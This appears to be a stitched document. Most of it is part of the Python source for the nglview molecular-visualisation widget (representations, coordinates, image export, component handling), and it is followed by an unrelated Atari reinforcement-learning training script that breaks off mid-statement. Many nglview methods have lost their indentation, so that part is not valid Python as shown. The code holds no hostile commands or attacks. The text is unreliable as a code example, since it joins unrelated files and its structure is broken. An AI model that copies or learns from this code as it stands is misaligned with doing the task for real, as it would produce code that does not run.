        """Spin the stage around `axis` by `angle` (frontend 'setSpin')."""
        self._remote_call('setSpin', target='Stage', args=[axis, angle])
    def _set_selection(self, selection, component=0, repr_index=0):
        """Change the atom selection of one representation."""
        self._remote_call("setSelection",
                          target='Representation',
                          args=[selection],
                          kwargs=dict(component_index=component,
                                      repr_index=repr_index))
    def color_by(self, color_scheme, component=0):
        '''update color for all representations of given component
        Notes
        -----
        Unstable feature
        Parameters
        ----------
        color_scheme : str
        component : int, default 0
            component index
        Examples
        --------
        >>> import nglview
        >>> view = nglview.demo()
        >>> # component 0
        >>> view.color_by('atomindex')
        >>> # component 1
        >>> view.color_by('atomindex', component=1)
        '''
        # apply the scheme to every representation currently known for
        # this component (requires an up-to-date _ngl_repr_dict)
        repr_names = get_repr_names_from_dict(self._ngl_repr_dict, component)
        for index, _ in enumerate(repr_names):
            self.update_representation(component=component,
                                       repr_index=index,
                                       color_scheme=color_scheme)
    @property
    def representations(self):
        """list of dict : last representations assigned from Python."""
        return self._representations
@representations.setter
def representations(self, reps):
if isinstance(reps, dict):
self._remote_call("_set_representation_from_repr_dict",
args=[reps])
else:
self._representations = reps[:]
for index in range(len(self._ngl_component_ids)):
self.set_representations(reps)
    def update_representation(self, component=0, repr_index=0, **parameters):
        """Update parameters of one existing representation.

        Parameters
        ----------
        component : int, default 0
            component index
        repr_index : int, default 0
            representation index for given component
        parameters : dict
            forwarded to NGL after camelization
        """
        parameters = _camelize_dict(parameters)
        kwargs = dict(component_index=component, repr_index=repr_index)
        kwargs.update(parameters)
        self._remote_call('setParameters',
                          target='Representation',
                          kwargs=kwargs)
        # pull the updated repr dict back so Python-side state stays fresh
        self._update_repr_dict()
    def _update_repr_dict(self):
        """ Send a request to frontend to send representation parameters
        back (arrives asynchronously as a 'request_repr_dict' message).
        # TODO: sync or async
        """
        self._remote_call('request_repr_dict', target='Widget')
def set_representations(self, representations, component=0):
"""
Parameters
----------
representations : list of dict
"""
self.clear_representations(component=component)
for params in representations:
assert isinstance(params, dict), 'params must be a dict'
kwargs = params['params']
kwargs.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
params['type'],
],
kwargs=kwargs)
    def _remove_representation(self, component=0, repr_index=0):
        """Remove a single representation by component/repr index."""
        self._remote_call('removeRepresentation',
                          target='Widget',
                          args=[component, repr_index])
    def _remove_representations_by_name(self, repr_name, component=0):
        """Remove all representations named `repr_name` (e.g. 'cartoon')
        from the given component."""
        self._remote_call('removeRepresentationsByName',
                          target='Widget',
                          args=[repr_name, component])
    def _update_representations_by_name(self, repr_name, component=0,
                                        **kwargs):
        """Update all representations named `repr_name` of one component;
        extra kwargs are camelized and forwarded to NGL."""
        kwargs = _camelize_dict(kwargs)
        self._remote_call('updateRepresentationsByName',
                          target='Widget',
                          args=[repr_name, component],
                          kwargs=kwargs)
    def _display_repr(self, component=0, repr_index=0, name=None):
        """Return a RepresentationControl widget for the given repr.

        Note: the `name` argument is effectively ignored — it is always
        overwritten from ``_ngl_repr_dict`` (falling back to '').
        """
        c = 'c' + str(component)
        r = str(repr_index)
        try:
            name = self._ngl_repr_dict[c][r]['type']
        except KeyError:
            name = ''
        return RepresentationControl(self, component, repr_index, name=name)
    def _set_coordinates(self, index, movie_making=False, render_params=None):
        # FIXME: use movie_making here seems awkward.
        '''update coordinates for all trajectories at index-th frame

        Hidden trajectories get an empty float32 array so the frontend
        keeps their components but draws nothing; out-of-range frames are
        handled the same way.
        '''
        render_params = render_params or {}
        if self._trajlist:
            coordinates_dict = {}
            for trajectory in self._trajlist:
                traj_index = self._ngl_component_ids.index(trajectory.id)
                try:
                    if trajectory.shown:
                        if self.player.interpolate:
                            t = self.player.iparams.get('t', 0.5)
                            step = self.player.iparams.get('step', 1)
                            coordinates_dict[traj_index] = interpolate.linear(
                                index, t=t, traj=trajectory, step=step)
                        else:
                            coordinates_dict[
                                traj_index] = trajectory.get_coordinates(index)
                    else:
                        coordinates_dict[traj_index] = np.empty((0),
                                                                dtype='f4')
                except (IndexError, ValueError):
                    coordinates_dict[traj_index] = np.empty((0), dtype='f4')
            self.set_coordinates(coordinates_dict,
                                 render_params=render_params,
                                 movie_making=movie_making)
        else:
            print("no trajectory available")
    def set_coordinates(self, arr_dict, movie_making=False,
                        render_params=None):
        # type: (Dict[int, np.ndarray]) -> None
        """Used for update coordinates of a given trajectory
        >>> # arr: numpy array, ndim=2
        >>> # update coordinates of 1st trajectory
        >>> view.set_coordinates({0: arr})# doctest: +SKIP
        """
        render_params = render_params or {}
        self._coordinates_dict = arr_dict
        buffers = []
        coordinates_meta = dict()
        # buffers are sent in dict insertion order; coordinates_meta maps
        # each position back to its trajectory index for the JS side
        for index, arr in self._coordinates_dict.items():
            buffers.append(arr.astype('f4').tobytes())
            coordinates_meta[index] = index
        msg = {
            'type': 'binary_single',
            'data': coordinates_meta,
        }
        if movie_making:
            msg['movie_making'] = movie_making
            msg['render_params'] = render_params
        self.send(
            msg,
            buffers=buffers)
    @observe('frame')
    def _on_frame_changed(self, change):
        """set and send coordinates at current frame
        """
        self._set_coordinates(self.frame)
    def clear(self, *args, **kwargs):
        '''shortcut of `clear_representations`
        '''
        self.clear_representations(*args, **kwargs)
    def clear_representations(self, component=0):
        '''clear all representations for given component
        Parameters
        ----------
        component : int, default 0 (first model)
            You need to keep track how many components you added.
        '''
        self._remote_call("removeAllRepresentations",
                          target='compList',
                          kwargs={'component_index': component})
    @_update_url
    def _add_shape(self, shapes, name='shape'):
        """add shape objects
        TODO: update doc, caseless shape keyword
        Parameters
        ----------
        shapes : list of tuple
        name : str, default 'shape'
            name of given shape
        Returns
        -------
        ComponentViewer bound to the freshly generated component id
        Notes
        -----
        Supported shape: 'mesh', 'sphere', 'ellipsoid', 'cylinder', 'cone', 'arrow'.
        See also
        --------
        {ngl_url}
        Examples
        --------
        >>> import nglview
        >>> view = nglview.demo()
        >>> sphere = ('sphere', [0, 0, 9], [1, 0, 0], 1.5)
        >>> arrow = ('arrow', [1, 2, 7 ], [30, 3, 3], [1, 0, 1], 1.0)
        >>> c = view._add_shape([sphere, arrow], name='my_shape')
        """
        self._remote_call('addShape', target='Widget', args=[name, shapes], fire_embed=True)
        # Added to remain in sync with the JS components
        # Similarly to _loadData
        cid = str(uuid.uuid4())
        self._ngl_component_ids.append(cid)
        comp_name = py_utils.get_name(self.shape, {})
        self._ngl_component_names.append(comp_name)
        self._update_component_auto_completion()
        return ComponentViewer(self, cid)
    @_update_url
    def add_representation(self, repr_type, selection='all', **kwargs):
        '''Add structure representation (cartoon, licorice, ...) for given atom selection.
        Parameters
        ----------
        repr_type : str
            type of representation. Please see {ngl_url} for further info.
        selection : str or 1D array (atom indices) or any iterator that returns integer, default 'all'
            atom selection
        **kwargs: additional arguments for representation
        Example
        -------
        >>> import nglview as nv
        >>> import pytraj
        >>> t = pytraj.datafiles.load_tz2()
        >>> w = nv.show_pytraj(t)
        >>> w.add_representation('cartoon', selection='protein', color='blue')
        >>> w.add_representation('licorice', selection=[3, 8, 9, 11], color='red')
        >>> w # doctest: +SKIP
        Notes
        -----
        User can also use shortcut
        >>> selection = 'protein'
        >>> w.add_cartoon(selection) # w.add_representation('cartoon', selection)
        '''
        if repr_type == 'surface':
            # surface rendering in a web worker can misbehave; default it off
            if 'useWorker' not in kwargs:
                kwargs['useWorker'] = False
        # avoid space sensitivity
        repr_type = repr_type.strip()
        # overwrite selection
        selection = seq_to_string(selection).strip()
        # make copy
        kwargs2 = _camelize_dict(kwargs)
        if 'component' in kwargs2:
            component = kwargs2.pop('component')
        else:
            component = 0
        # strip string-valued parameters too (same space-sensitivity issue)
        for k, v in kwargs2.items():
            try:
                kwargs2[k] = v.strip()
            except AttributeError:
                # e.g.: opacity=0.4
                kwargs2[k] = v
        d = {'params': {'sele': selection}}
        d['type'] = repr_type
        d['params'].update(kwargs2)
        params = d['params']
        params.update({'component_index': component})
        self._remote_call('addRepresentation',
                          target='compList',
                          args=[
                              d['type'],
                          ],
                          kwargs=params)
    @_deprecated("DEPRECATED: Please use 'center' method")
    def center_view(self, *args, **kwargs):
        """Deprecated alias of `center`.
        """
        self.center(*args, **kwargs)
    def center(self, selection='*', duration=0, component=0, **kwargs):
        """center view for given atom selection
        Examples
        --------
        view.center(selection='1-4')
        """
        self._remote_call('autoView',
                          target='compList',
                          args=[selection, duration],
                          kwargs={'component_index': component},
                          **kwargs)
    @observe('_image_data')
    def _on_render_image(self, change):
        '''update image data to widget_image
        Notes
        -----
        method name might be changed
        '''
        # NOTE(review): assumes self._widget_image (not visible in this
        # chunk) is an ipywidgets Image — confirm.
        self._widget_image._b64value = change['new']
    def render_image(self,
                     frame=None,
                     factor=4,
                     antialias=True,
                     trim=False,
                     transparent=False):
        """render and get image as ipywidgets.widget_image.Image
        Parameters
        ----------
        frame : int or None, default None
            if None, use current frame
            if specified, use this number.
        factor : int, default 4
            quality of the image, higher is better
        antialias : bool, default True
        trim : bool, default False
        transparent : bool, default False
        Returns
        -------
        ipywidgets Image whose `value` is filled in asynchronously once
        the frontend sends the rendered bytes back (see `_ngl_handle_msg`,
        'image_data' branch, which looks the widget up by model id).
        Examples
        --------
        # tell NGL to render send image data to notebook.
        view.render_image()
        # make sure to call `get_image` method
        view.get_image()
        Notes
        -----
        You need to call `render_image` and `get_image` in different notebook's Cells
        """
        if frame is not None:
            self.frame = frame
        params = dict(factor=factor,
                      antialias=antialias,
                      trim=trim,
                      transparent=transparent)
        iw = Image()
        iw.width = '99%'  # avoid ugly scroll bar on notebook.
        self._remote_call('_exportImage',
                          target='Widget',
                          args=[iw.model_id],
                          kwargs=params)
        # iw.value will be updated later after frontend send the image_data back.
        return iw
    def download_image(self,
                       filename='screenshot.png',
                       factor=4,
                       antialias=True,
                       trim=False,
                       transparent=False):
        """render and download scene at current frame
        (the browser performs the actual file download)
        Parameters
        ----------
        filename : str, default 'screenshot.png'
        factor : int, default 4
            quality of the image, higher is better
        antialias : bool, default True
        trim : bool, default False
        transparent : bool, default False
        """
        params = dict(factor=factor,
                      antialias=antialias,
                      trim=trim,
                      transparent=transparent)
        self._remote_call('_downloadImage',
                          target='Widget',
                          args=[
                              filename,
                          ],
                          kwargs=params)
    def _ngl_handle_msg(self, widget, msg, buffers):
        """store message sent from Javascript.
        How? use view.on_msg(get_msg)
        Notes: message format should be {'type': type, 'data': data}
        _ngl_handle_msg will call appropriate function to handle message "type"
        """
        self._ngl_msg = msg
        msg_type = self._ngl_msg.get('type')
        if msg_type == 'request_frame':
            # playback: advance by player.step, wrapping at both ends
            frame = self.frame + self.player.step
            if frame > self.max_frame:
                frame = 0
            elif frame < 0:
                frame = self.max_frame
            self.frame = frame
        elif msg_type == 'updateIDs':
            self._ngl_view_id = msg['data']
        elif msg_type == 'removeComponent':
            # frontend-initiated removal; mirror it in Python state
            cindex = int(msg['data'])
            self._ngl_component_ids.pop(cindex)
        elif msg_type == 'repr_parameters':
            data_dict = self._ngl_msg.get('data')
            # trailing '\n' lets the GUI text widgets detect a fresh value
            name = data_dict.pop('name') + '\n'
            selection = data_dict.get('sele', '') + '\n'
            # json change True to true
            data_dict_json = json.dumps(data_dict).replace(
                'true', 'True').replace('false', 'False')
            data_dict_json = data_dict_json.replace('null', '"null"')
            if self.player.widget_repr is not None:
                # TODO: refactor
                repr_name_text = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'repr_name_text')
                repr_selection = widget_utils.get_widget_by_name(
                    self.player.widget_repr, 'repr_selection')
                repr_name_text.value = name
                repr_selection.value = selection
        elif msg_type == 'request_loaded':
            if not self.loaded:
                # trick to trigger observe loaded
                # so two viewers can have the same representations
                self.loaded = False
            self.loaded = msg.get('data')
        elif msg_type == 'request_repr_dict':
            # update _repr_dict will trigger other things
            # see _handle_repr_dict_changed
            self._ngl_repr_dict = self._ngl_msg.get('data')
        elif msg_type == 'stage_parameters':
            self._ngl_full_stage_parameters = msg.get('data')
        elif msg_type == 'async_message':
            # unblocks _wait_until_finished
            if msg.get('data') == 'ok':
                self._event.set()
        elif msg_type == 'image_data':
            # route the rendered image to the Image widget created in
            # render_image, identified by its model id
            self._image_data = msg.get('data')
            Widget.widgets[msg.get('ID')].value = base64.b64decode(
                self._image_data)
    def _request_repr_parameters(self, component=0, repr_index=0):
        """Ask the frontend for one repr's parameters (no-op when there
        are no components); reply arrives as a 'repr_parameters' message."""
        if self.n_components > 0:
            self._remote_call('requestReprParameters',
                              target='Widget',
                              args=[component, repr_index])
def add_structure(self, structure, **kwargs):
'''add structure to view
Parameters
----------
structure : nglview.Structure object
Examples
--------
>>> view.add_trajectory(traj0) # doctest: +SKIP
... view.add_trajectory(traj1)
... # then add Structure
... view.add_structure(s)
See Also
--------
nglview.NGLWidget.add_component
'''
if not isinstance(structure, Structure):
raise ValueError(f'{structure} is not an instance of Structure')
self._load_data(structure, **kwargs)
self._ngl_component_ids.append(structure.id)
if self.n_components > 1:
self.center_view(component=len(self._ngl_component_ids) - 1)
self._update_component_auto_completion()
return self[-1]
def add_trajectory(self, trajectory, **kwargs):
'''add new trajectory to `view`
Parameters
----------
trajectory: nglview.Trajectory or its derived class or
a supported object, eg pytraj.Trajectory-like,
mdtraj.Trajectory, MDAnalysis objects, etc
See Also
--------
nglview.NGLWidget.add_component
Examples
--------
>>> import nglview as nv, pytraj as pt
>>> traj = pt.load(nv.datafiles.TRR, nv.datafiles.PDB)
>>> view = nv.show_pytraj(traj)
>>> # show view first
>>> view # doctest: +SKIP
>>> # add new Trajectory
>>> traj2 = pt.datafiles.load_tz2()
>>> c = view.add_trajectory(traj2)
'''
backends = BACKENDS
package_name = trajectory.__module__.split('.')[0]
if package_name in backends:
trajectory = backends[package_name](trajectory)
else:
trajectory = trajectory
self._load_data(trajectory, **kwargs)
setattr(trajectory, 'shown', True)
self._trajlist.append(trajectory)
self._update_max_frame()
self._ngl_component_ids.append(trajectory.id)
self._update_component_auto_completion()
return self[-1]
    def add_pdbid(self, pdbid, **kwargs):
        '''add new Structure view by fetching pdb id from rcsb
        (the frontend performs the network fetch)
        Examples
        --------
        >>> import nglview
        >>> view = nglview.NGLWidget()
        >>> c = view.add_pdbid('1tsu')
        >>> # which is equal to
        >>> # view.add_component('rcsb://1tsu.pdb')
        '''
        return self.add_component(f'rcsb://{pdbid}.pdb', **kwargs)
    def add_component(self, filename, **kwargs):
        '''add component from file/trajectory/struture
        Parameters
        ----------
        filename : str or Trajectory or Structure or their derived class or url
        **kwargs : additional arguments, optional
        Examples
        --------
        >>> import nglview
        >>> view = nglview.NGLWidget()
        >>> view # doctest: +SKIP
        ... filename = 'somefile.ccp4'
        ... view.add_component(filename)
        Notes
        -----
        If you want to load binary file such as density data, mmtf format, it is
        faster to load file from current or subfolder.
        '''
        # if passed a supported object, convert "filename" to nglview.Trajectory
        try:
            package_name = filename.__module__.split('.')[0]
        except (TypeError, AttributeError):
            # string filename
            pass
        else:
            if package_name in BACKENDS:
                filename = BACKENDS[package_name](filename)
        self._load_data(filename, **kwargs)
        # assign an ID
        self._ngl_component_ids.append(str(uuid.uuid4()))
        self._update_component_auto_completion()
        return self[-1]
    def _load_data(self, obj, **kwargs):
        '''Send a 'loadFile' message for `obj` (structure object, file
        path/buffer, or URL).

        Parameters
        ----------
        obj : nglview.Structure or any object having 'get_structure_string' method or
            string buffer (open(fn).read())
        '''
        kwargs2 = _camelize_dict(kwargs)
        try:
            is_url = FileManager(obj).is_url
        except NameError:
            is_url = False
        if 'defaultRepresentation' not in kwargs2:
            kwargs2['defaultRepresentation'] = True
        if not is_url:
            if hasattr(obj, 'get_structure_string'):
                blob = obj.get_structure_string()
                kwargs2['ext'] = obj.ext
                passing_buffer = True
                binary = False
            else:
                fh = FileManager(obj,
                                 ext=kwargs.get('ext'),
                                 compressed=kwargs.get('compressed'))
                # assume passing string
                blob = fh.read()
                passing_buffer = not fh.use_filename
                if fh.ext is None and passing_buffer:
                    raise ValueError('must provide extension')
                kwargs2['ext'] = fh.ext
                binary = fh.is_binary
                use_filename = fh.use_filename
            # NOTE: `use_filename` is only bound in the FileManager branch;
            # this is safe because `binary` is False in the other branch,
            # short-circuiting before `use_filename` is evaluated.
            if binary and not use_filename:
                # send base64
                blob = base64.b64encode(blob).decode('utf8')
            blob_type = 'blob' if passing_buffer else 'path'
            args = [{'type': blob_type, 'data': blob, 'binary': binary}]
        else:
            # is_url
            blob_type = 'url'
            url = obj
            args = [{'type': blob_type, 'data': url, 'binary': False}]
        name = py_utils.get_name(obj, kwargs2)
        self._ngl_component_names.append(name)
        self._remote_call("loadFile",
                          target='Stage',
                          args=args,
                          kwargs=kwargs2)
    def remove_component(self, c):
        """remove component by its uuid.
        If isinstance(c, ComponentViewer), `c` won't be associated with `self`
        Parameters
        ----------
        c : Union[int, ComponentViewer]
        Examples
        --------
        >>> c0 = view.add_trajectory(traj0) # doctest: +SKIP
        ... c1 = view.add_trajectory(traj1)
        ... c2 = view.add_struture(structure)
        ... # remove last component
        ... view.remove_component(c2)
        ... assert c2._view is None
        """
        if isinstance(c, ComponentViewer):
            component_id = c.id
            c._view = None
        else:
            component_id = c
        # tab-completion attrs are rebuilt below with shifted indices
        self._clear_component_auto_completion()
        if self._trajlist:
            for traj in self._trajlist:
                if traj.id == component_id:
                    self._trajlist.remove(traj)
        component_index = self._ngl_component_ids.index(component_id)
        self._ngl_component_ids.remove(component_id)
        self._ngl_component_names.pop(component_index)
        self._remote_call('removeComponent',
                          target='Stage',
                          args=[
                              component_index,
                          ])
        self._update_component_auto_completion()
    def _dry_run(self, func, *args, **kwargs):
        """Delegate to the module-level `_dry_run` helper for this view."""
        return _dry_run(self, func, *args, **kwargs)
def _get_remote_call_msg(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
"""call NGL's methods from Python.
Parameters
----------
method_name : str
target : str, {'Stage', 'Viewer', 'compList', 'StructureComponent'}
args : list
kwargs : dict
if target is 'compList', "component_index" could be passed
to specify which component will call the method.
Examples
--------
view._remote_call('loadFile', args=['1L2Y.pdb'],
target='Stage', kwargs={'defaultRepresentation': True})
# perform autoView for 1st component
# JS code
# component = Stage.compList[1];
# component.autoView('*', 200)
# python
view._remote_call('autoView',
target='component',
args=['*', 200],
kwargs={'component_index': 1})
"""
# NOTE: _camelize_dict here?
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
msg = {}
if 'component_index' in kwargs:
msg['component_index'] = kwargs.pop('component_index')
if 'repr_index' in kwargs:
msg['repr_index'] = kwargs.pop('repr_index')
if 'default' in kwargs:
kwargs['defaultRepresentation'] = kwargs.pop('default')
# Color handling
reconstruc_color_scheme = False
if 'color' in kwargs and isinstance(kwargs['color'],
color._ColorScheme):
kwargs['color_label'] = kwargs['color'].data['label']
# overite `color`
kwargs['color'] = kwargs['color'].data['data']
reconstruc_color_scheme = True
if kwargs.get('colorScheme') == 'volume' and kwargs.get('colorVolume'):
assert isinstance(kwargs['colorVolume'], ComponentViewer)
kwargs['colorVolume'] = kwargs['colorVolume']._index
msg['target'] = target
msg['type'] = 'call_method'
msg['methodName'] = method_name
msg['reconstruc_color_scheme'] = reconstruc_color_scheme
msg['args'] = args
msg['kwargs'] = kwargs
if other_kwargs:
msg.update(other_kwargs)
return msg
def _trim_message(self, messages):
messages = messages[:]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
if not remove_comps:
return messages
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] in ('loadFile', 'addShape')
]
messages_rm = [r[0] for r in remove_comps]
messages_rm += [load_comps[r[1]] for r in remove_comps]
messages_rm = set(messages_rm)
return [
msg for i, msg in enumerate(messages)
if i not in messages_rm
]
    def _remote_call(self,
                     method_name,
                     target='Widget',
                     args=None,
                     kwargs=None,
                     **other_kwargs):
        """Queue a frontend method call (message built by
        `_get_remote_call_msg`).

        If the widget is already loaded the callback goes to the
        remote-call thread's queue; otherwise it is stored and fired once
        the frontend reports 'loaded'.  Most messages are also archived in
        ``_ngl_msg_archive`` for embedding/replay, unless the method is in
        ``_EXCLUDED_CALLBACK_AFTER_FIRING`` or ``fire_once=True`` is given.
        """
        msg = self._get_remote_call_msg(method_name,
                                        target=target,
                                        args=args,
                                        kwargs=kwargs,
                                        **other_kwargs)
        def callback(widget, msg=msg):
            widget.send(msg)
        # tagged so _fire_callbacks / _trim_message can inspect the call
        callback._method_name = method_name
        callback._ngl_msg = msg
        if self.loaded:
            self._remote_call_thread.q.append(callback)
        else:
            # send later
            # all callbacks will be called right after widget is loaded
            self._ngl_displayed_callbacks_before_loaded.append(callback)
        if callback._method_name not in _EXCLUDED_CALLBACK_AFTER_FIRING and \
            (not other_kwargs.get("fire_once", False)):
            archive = self._ngl_msg_archive[:]
            archive.append(msg)
            self._ngl_msg_archive = self._trim_message(archive)
def _get_traj_by_id(self, itsid):
"""return nglview.Trajectory or its derived class object
"""
for traj in self._trajlist:
if traj.id == itsid:
return traj
return None
def hide(self, indices):
"""set invisibility for given component/struture/trajectory (by their indices)
"""
traj_ids = {traj.id for traj in self._trajlist}
for index in indices:
comp_id = self._ngl_component_ids[index]
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=[
False,
],
kwargs={'component_index': index})
    def show(self, **kwargs):
        """shortcut of `show_only`
        """
        self.show_only(**kwargs)
def show_only(self, indices='all', **kwargs):
"""set visibility for given components (by their indices)
Parameters
----------
indices : {'all', array-like}, component index, default 'all'
"""
traj_ids = {traj.id for traj in self._trajlist}
if indices == 'all':
indices_ = set(range(self.n_components))
else:
indices_ = set(indices)
for index, comp_id in enumerate(self._ngl_component_ids):
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
else:
traj = None
if index in indices_:
args = [
True,
]
if traj is not None:
traj.shown = True
else:
args = [
False,
]
if traj is not None:
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=args,
kwargs={'component_index': index},
**kwargs)
    def _js_console(self):
        """Send a 'get' message (data='any') to the frontend."""
        self.send(dict(type='get', data='any'))
    def _get_full_params(self):
        """Ask the frontend to send back its full parameter set."""
        self.send(dict(type='get', data='parameters'))
    def _display_image(self):
        '''for testing: decode the last received base64 image data into
        an IPython display Image.
        '''
        from IPython import display
        im_bytes = base64.b64decode(self._image_data)
        return display.Image(im_bytes)
def _clear_component_auto_completion(self):
for index, _ in enumerate(self._ngl_component_ids):
name = 'component_' + str(index)
delattr(self, name)
    def _js(self, code, **kwargs):
        """Shortcut of `_execute_js_code`."""
        self._execute_js_code(code, **kwargs)
    def _execute_js_code(self, code, **kwargs):
        """Run a JavaScript string in the frontend widget context."""
        self._remote_call('executeCode',
                          target='Widget',
                          args=[code],
                          **kwargs)
    def _update_component_auto_completion(self):
        """Expose ``component_<i>`` attributes (and ``trajectory_<j>`` for
        trajectory components) for interactive tab completion."""
        trajids = [traj.id for traj in self._trajlist]
        for index, cid in enumerate(self._ngl_component_ids):
            comp = ComponentViewer(self, cid)
            name = 'component_' + str(index)
            setattr(self, name, comp)
            if cid in trajids:
                traj_name = 'trajectory_' + str(trajids.index(cid))
                setattr(self, traj_name, comp)
def __getitem__(self, index):
"""return ComponentViewer
"""
postive_index = py_utils.get_positive_index(
index, len(self._ngl_component_ids))
return ComponentViewer(self, self._ngl_component_ids[postive_index])
def __iter__(self):
"""return ComponentViewer
"""
for i, _ in enumerate(self._ngl_component_ids):
yield self[i]
class Fullscreen(DOMWidget):
    """EXPERIMENTAL widget that drives browser fullscreen for a target view."""
    # Frontend/model wiring for the nglview-js-widgets package.
    _view_name = Unicode("FullscreenView").tag(sync=True)
    _view_module = Unicode("nglview-js-widgets").tag(sync=True)
    _view_module_version = Unicode(__frontend_version__).tag(sync=True)
    _model_name = Unicode("FullscreenModel").tag(sync=True)
    _model_module = Unicode("nglview-js-widgets").tag(sync=True)
    _model_module_version = Unicode(__frontend_version__).tag(sync=True)
    # Synced from the frontend: whether the browser is in fullscreen mode.
    _is_fullscreen = Bool().tag(sync=True)

    def __init__(self, target, views):
        super().__init__()
        self._target = target
        self._views = views

    def fullscreen(self):
        """Ask the frontend to put the target widget into fullscreen."""
        self._js("this.fullscreen('%s')" % self._target.model_id)

    def _js(self, code):
        """Forward a javascript snippet to the frontend."""
        self.send({"executeCode": code})

    @observe('_is_fullscreen')
    def _fullscreen_changed(self, change):
        """On leaving fullscreen, restore the target height and re-layout."""
        if change.new:
            return
        self._target.layout.height = '300px'
        self.handle_resize()

    def handle_resize(self):
        """Propagate a resize to every registered view."""
        for view in self._views:
            view.handle_resize()
|
simple_train.py | import utils.atari_wrapper as atari_wrapper
from utils.multi import create_buffers, get_batch, act
import torch.multiprocessing as mp
# from utils
import argparse
from model.atari_impala import AtariCasaNet
import logging
import torch
import time
import timeit
import os
import utils.some_trace as some_trace
import utils.some_loss as some_loss
import threading
import pprint
from utils import file_writer,prof
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
def create_env(name):
    """Build a pytorch-ready Atari environment with deepmind preprocessing."""
    base = atari_wrapper.make_atari_by_id(name)  # e.g. PongNoFrameskip-v0
    wrapped = atari_wrapper.wrap_deepmind(
        base,
        clip_rewards=False,
        frame_stack=True,
        scale=False,
    )
    return atari_wrapper.wrap_pytorch(wrapped)
# Command-line interface for the training script.
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
                    help="Gym environment.")
parser.add_argument("--mode", default="train",
                    choices=["train", "test", "test_render"],
                    help="Training or test mode.")
parser.add_argument("--xpid", default=None,
                    help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
                    help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
                    help="Root dir where experiment data will be saved.")
# Fixed help text: the actual default is 16, not 4 as previously claimed.
parser.add_argument("--num_actors", default=16, type=int, metavar="N",
                    help="Number of actors (default: 16).")
parser.add_argument("--total_steps", default=2 * int(1e6), type=int, metavar="T",
                    help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=4, type=int, metavar="B",
                    help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
                    help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
                    metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=4, type=int,
                    metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
                    help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
                    help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
                    type=float, help="Entropy cost/multiplier.")
parser.add_argument("--q_cost", default=1,
                    type=float, help="q cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
                    type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
                    type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
                    choices=["abs_one", "none"],
                    help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
                    type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
                    help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
                    help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
                    help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
                    help="Global gradient norm clip.")
# Root logger configuration; level=0 lets every record through.
logging.basicConfig(
    format=(
        "[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
    ),
    level=0,
)
def casalearn(
    flags,
    actor_model,
    model,
    batch,
    initial_agent_state,
    optimizer,
    scheduler,
    lock=threading.Lock(),  # noqa: B008
):
    """Performs a learning (optimization) step.

    Runs the learner ``model`` over one batch, combines a V-trace policy
    gradient loss, baseline loss, Retrace Q loss and entropy bonus into a
    single objective, applies one optimizer + scheduler step, and finally
    copies the updated weights into the shared ``actor_model``.

    The mutable default ``lock`` is deliberate (hence the noqa): all
    learner threads share one module-level lock, serializing updates.
    """
    with lock:
        # print('learn start')
        learner_outputs, unused_state = model(batch, initial_agent_state)
        # print('forward ok')
        # Take final value function slice for bootstrapping.
        bootstrap_value = learner_outputs["baseline"][-1]
        bootstrap_qvalue = learner_outputs["q"][-1]
        # Move from obs[t] -> action[t] to action[t] -> obs[t].
        batch = {key: tensor[1:] for key, tensor in batch.items()}
        learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
        rewards = batch["reward"]
        # flags.reward_clipping is restricted by argparse choices, so one of
        # these branches always runs.
        if flags.reward_clipping == "abs_one":
            clipped_rewards = torch.clamp(rewards, -1, 1)
        elif flags.reward_clipping == "none":
            clipped_rewards = rewards
        # Zero the discount at episode boundaries.
        discounts = (~batch["done"]).float() * flags.discounting
        vtrace_returns = some_trace.v_trace_from_logits(
            behavior_policy_logits=batch["policy_logits"],
            target_policy_logits=learner_outputs["policy_logits"],
            actions=batch["action"],
            discounts=discounts,
            rewards=clipped_rewards,
            values=learner_outputs["baseline"],
            bootstrap_value=bootstrap_value,
        )
        # print('vtrace ok')
        retrace_returns = some_trace.retrace_from_logits(
            behavior_policy_logits=batch["policy_logits"],
            target_policy_logits=learner_outputs["policy_logits"],
            actions=batch["action"],
            discounts=discounts,
            rewards=clipped_rewards,
            q_values=learner_outputs["q"],
            bootstrap_value=bootstrap_qvalue,
        )
        # print('retrace ok')
        pg_loss = some_loss.compute_policy_gradient_loss(
            learner_outputs["policy_logits"],
            batch["action"],
            vtrace_returns.pg_advantages,
        )
        baseline_loss = flags.baseline_cost * some_loss.compute_baseline_loss(
